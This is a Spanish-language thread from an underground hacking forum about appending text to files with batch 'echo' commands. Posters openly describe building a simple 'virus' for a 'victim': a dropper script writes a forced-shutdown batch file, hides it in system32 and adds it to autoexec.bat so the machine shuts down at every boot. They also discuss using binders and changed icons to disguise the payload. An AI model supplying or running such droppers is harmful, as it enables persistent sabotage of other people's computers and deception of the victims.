Comunidad Underground Hispana  

Retroceder   Comunidad Underground Hispana > Programacion > Batch

Respuesta Crear Nuevo Tema

Compartir en twitter LinkBack Herramientas Desplegado
Antiguo 01-feb-2005, 11:54   #1
i_berbeu
Guest

Amigos
Predeterminado editar .bat desde msdos

Buenas!!!!
Necesito a ver si alguien me puede comentar si es posible hacer un append a un fichero desde DOS sin abrir el edit ni ningun editor de textos. Por si no me explico, me refiero a aadir texto a un fichero sin editor de texto alguno.
Me gustaria usar esto en un .bat para modificar remotamente otros ficheros que ya existan.
O bueno... a mi se me ha ocurrido hacerlo asi pero como no tengo casi idea todavia de estas cosas posiblemente haya mil formas mejores de hacerlo.
Acepto cualquier critica y sugerencia
Gracias!
Antiguo 01-feb-2005, 17:22   #2
Viper
Guest

Amigos
Predeterminado Re: editar .bat desde msdos

claro que si, mira puedes poner esto en la linea de comandos ,puedes probarlo en tu cmd:

echo "el texto que quieres meter dentro del fichero (sin las comillas xD)" >elfichero.txt

Con esto habras creado un fichero txt y su contenido sera el que hayas especificado ahi.

saludos
Antiguo 02-feb-2005, 11:22   #3
k4ron73
Guest

Amigos

Perdona que te corrija, Viper... espero que no te moleste!

Si pones echo loquesea archivo.txt
solamente escribir en pantalla: loquesea archivo.txt
Para crear un archivo o introducir una linea en un archivo ya creado tienes que poner:

echo loquequieresintroducir >> archivo.txt

Esto aadir "loquequieresintroducir" en la primera linea del cdigo. (En caso de no existir "archivo.txt" esta orden crea este archivo)

Si lo que quieres es SUSTITUIR el codigo por otro:

echo loquequierassustituir > archivo.txt

Esta linea eliminar el contenido previo de "archivo.txt" y lo sustituir por lo que has introducido nuevo. (tambin crea el archivo.txt en caso de no existir)

Entonces puedo modificar el autoexec.bat as de facil?????

Acabas de descubrir como hacer un virus muy facil:

echo shutdown -s -f -t 5 >> c:\autoexec.bat

Esto incluye en la primera linea del autoexec esta instruccin... de manera que el ordenador solo durar 5 segundos encendido. ;D
Antiguo 02-feb-2005, 11:50   #4
i_berbeu
Guest

Amigos

Gracias a los dos!!
Del mensaje de Viper ya me di cuenta yo que le faltaba lo del >> porque precisamente me raye con eso para sobreescribir, y lo que me faltaba era la instruccion echo que no sabia yo que la podias usar asi para escribir en un archivo, me creia que solo era para respuestas de la consola. Yo es que soy muy nuevo en esto todavia.
Antiguo 02-feb-2005, 11:55   #5
i_berbeu
Guest

Amigos

Si podeis dar ayuda en otra cosilla.....

A ver. Todo lo anterior es porque me gustaria mandar un .bat que modifique el autoexec y aada un linea
start= "c:\......\archivo.bat"
Y ademas meter un archivo .bat en esa direccion y asi conseguir que se inicie con el windows. Ya se como modificar el autoexec, pero necesito saber alguna forma de enviar los dos archivos .bat (el que modifica el .bat y el que quiero que se ejecute en el arranque windows) en uno para que no tenga que enviar dos archivos en distintas ocasiones a la victima. Con un binder o algo asi yo creo que se podria no??? Pero de esa forma si lo ejecuta no se ejecutarian los dos a la vez???

No se si me he explicado. Si es asi y sabeis alguna ayuda aqui estoy pa escucharla

Gracias!!!!
Antiguo 02-feb-2005, 13:32   #6
k4ron73
Guest

Amigos

SI que te has explicado perfectamente... pero eso que tu dices el algo dificil... Puedes intentar hacer lo siguiente:

Voy a explicarte con un ejemplo:

El archivo1.bat es el que va a hacer de "instalador"
El archivo2.bat es el realmente malicioso.

El archivo2.bat va a hacer que se apage el ordenador.OK?

Procedemos:

@echo off
cls
cd\

echo shutdown -s -f -t 1 > archivo2.bat <--- con esto creamos el archivo2.bat
copy archivo2.bat c:\windows\system32\archivo2.bat <--- con esto movemos el archivo del C:\ y lo ocultamos en system32 (por ejemplo)
echo start c:\windows\system32\archivo2.bat >> autoexec.bat
exit

Ya has creado el archivo2.bat lo has escondido y has aadido al autoexec que lo ejecute en cada inicio.
Lo has entendido?
Si quieres crear un archivo2.bat ms complejo, tendrs que ir aadiendo su codigo linea a linea desde el archivo1.bat.

Esta es una tecnica de expansin que usan algunos virus. Y como ves es muy facil de crear!

Saludos!
Antiguo 02-feb-2005, 16:51   #7
i_berbeu
Guest

Amigos

Gracias k4ron73
Habia pensado eso yo tambien lo unico que como antes, eso de echo para escribir en un fichero no lo habia tenido en cuenta... mas que nada porque no lo sabia jejeje
Yo lo decia por si habia una tecnica mas chula por ahi. Imagino que la habra pero como dices sera complicada asi que bueno, si consigo algo por ahi pues de lujo y si no creo que coon esto me bastara

Por cierto, me lei una cosa de otro foro que pusiste tu sobre como convertir un .bat en un .exe y lo consigo pero luego la herramienta reshack no funciona correctamente con ese ejecutable pero si me funciona con otros. Me dice lo tipico de que no es un win32 valido o algo asi, si sabes porque ya sabes ande estoy.

Gracias. Eres un gran solucionador de dudas
Antiguo 03-feb-2005, 14:19   #8
k4ron73
Guest

Amigos

Munchas gracias por tu apoyo. Yo te agradezco a t hacer preguntas interesantes!

No te funciona el reshack?? Prueba a pulsar con el botn derecho sobre el exe y aadirle un icono manualmente. Boton derecho>>propiedades>>cambiar icono.

Prueba as pero no se si funcionar (estoy en un ciber y no es plan de ponerme a probarlo ahora...) Luego me cuentas
Antiguo 03-feb-2005, 18:44   #9
LooSeR[FT]
Guest

Amigos

Pos sorry por corregirte pero no creo que funcione ya que eso de cambiar icono desde propiedades esta solo disponible para los "accesos directos" no para los .exe si no te funciona el reshack.. para cambiar el icono pos nose, busca algun programa diferente que seguro que existe alguno que te de esa opcion, al igual que un binder, etc
Antiguo 03-feb-2005, 18:54   #10
i_berbeu
Guest

Amigos

Si es verdad que en los .exe no se puede cambiar el icono. Pero en algunos si te lo permite la verdad es que no se porque pero he estado provando y algunos si te deja y otros no. Pero bueno al menos en los .exe que creas desde los .bat si te lo permite asi que algo es algo. Y como es eso lo que necesito pues de lujo.
Antiguo 04-feb-2005, 06:59   #11
k4ron73
Guest

Amigos

Bueno... no estaba muy seguro de que esta tcnica servira... pero por probar que no quede!
Antiguo 31-dic-2005, 07:54   #12
Recien llegado

Amigos 0
Agradecido 0 veces en 0 mensajes.

Cita:
Iniciado por k4ron73
SI que te has explicado perfectamente... pero eso que tu dices el algo dificil... Puedes intentar hacer lo siguiente:

Voy a explicarte con un ejemplo:

El archivo1.bat es el que va a hacer de "instalador"
El archivo2.bat es el realmente malicioso.

El archivo2.bat va a hacer que se apage el ordenador.OK?

Procedemos:

@echo off
cls
cd\

echo shutdown -s -f -t 1 > archivo2.bat <--- con esto creamos el archivo2.bat
copy archivo2.bat c:\windows\system32\archivo2.bat <--- con esto movemos el archivo del C:\ y lo ocultamos en system32 (por ejemplo)
exit

Ya has creado el archivo2.bat lo has escondido y has aadido al autoexec que lo ejecute en cada inicio.
Lo has entendido?
Si quieres crear un archivo2.bat ms complejo, tendrs que ir aadiendo su codigo linea a linea desde el archivo1.bat.

Esta es una tecnica de expansin que usan algunos virus. Y como ves es muy facil de crear!

Saludos!

Seor k4ron73 perdone mi ignorancia es muy amplia lo se...
pero estaviendo la explicacion q nos dabas de como se ejecute el ejemplo2.bat en cada inicio,
hay una cosita q no entiendo....
supuestamente le estamos mandando ordenes al autoexec.bat que ya previamente lo dejamos en la victima ?...
es asi o me equivoco?

Como seria esto uf me matastes me quede en 33 .... si pudiera mostrar un ejemplo por favor ... soy muy tonton... lo siento
-.Proxip.- está desconectado   Responder Citando
Antiguo 31-dic-2005, 10:14   #13
GvAp0
Guest

Amigos

Te lo voy a explicar yo pork debajo de la firma de K4ron73 pone que no va estar aso que intento explicartelo de todas formas te lo que te lo explique el cuando vuelva

Cita:
supuestamente le estamos mandando ordenes al autoexec.bat que ya previamente lo dejamos en la victima ?...
es asi o me equivoco?
Lo que hace es crear un el archivo2.bat con el codigo para reiniciar el ordenador en 1 segundo y despues le inserta la siguiente line de comando en el autoexec.bat que es un bat que se inicia cada vez que se encienda el ordenador asi :

Haciendo que inicie el archivo2.bat cada vez que se encienda el ordenador.

Cita:

Como seria esto uf me matastes me quede en 33 .... si pudiera mostrar un ejemplo por favor ... soy muy tonton... lo siento
Si lo quieres crear desde otro bat si tienes que aadir el codigo linea por linea a no ser que halla otra forma que no se.

Saludos

PD: No creo que seas tonto solo que estas aprendiendo pero si tu dices que eres tonto yo te hago caso XD.

Antiguo 27-abr-2006, 08:10   #14
alejandr0
Guest

Amigos

hey holas tengo una duda puedo ponerle un comando a un echo.. aver no se si me explico bien..

@echo off
cd C:\
echo > destructor.bat
echo > hola.bat
echo del hola.bat >> destructor.bat( eso es lo que quiero que me expliquen sie puedo ponerle la orden de que borre a hola.bat con esas lineas.. si existe alguna manera me podrian ayudar? )

Antiguo 28-abr-2006, 22:58   #15
Veterano

Amigos 0
Agradecido 6 veces en 4 mensajes.

echo echo hola>hola.bat
echo pause>>hola.bat
echo del /f /s /q hola.bat>dst.bat

es simple, la estructura es:
hay dos tipos.

1.Tipo, creador de bat.

este tipo es el que crea un nuevo .bat a partir de una linea de texto solo con echo.
Su estructura es:

echo [comandos_del_nuevo_bat] >> [Nombre_del_archivo]

2.Tipo, guardar comandos.

lo que hace es guardar la ejecucion de un bat en un archivo.

ipconfig>file.txt

abres file.txt y veras la ejecucion de ipconfig.

NOTA.

NO es lo mismo

echo hola>archivo.txt
echo comando>archivo.bat

lo que pasa es que si queres crear un archivo ReadMe debes solo colocar echo a las palabras que queres guardar, pero si queres guardar un bat con comandos a partir de un bat anterior debes colocar echo y el comando.

Espero que hallas entendido.
cualquer duda aqui estamos.

Salu2

Herramientas
Desplegado

Normas de Publicación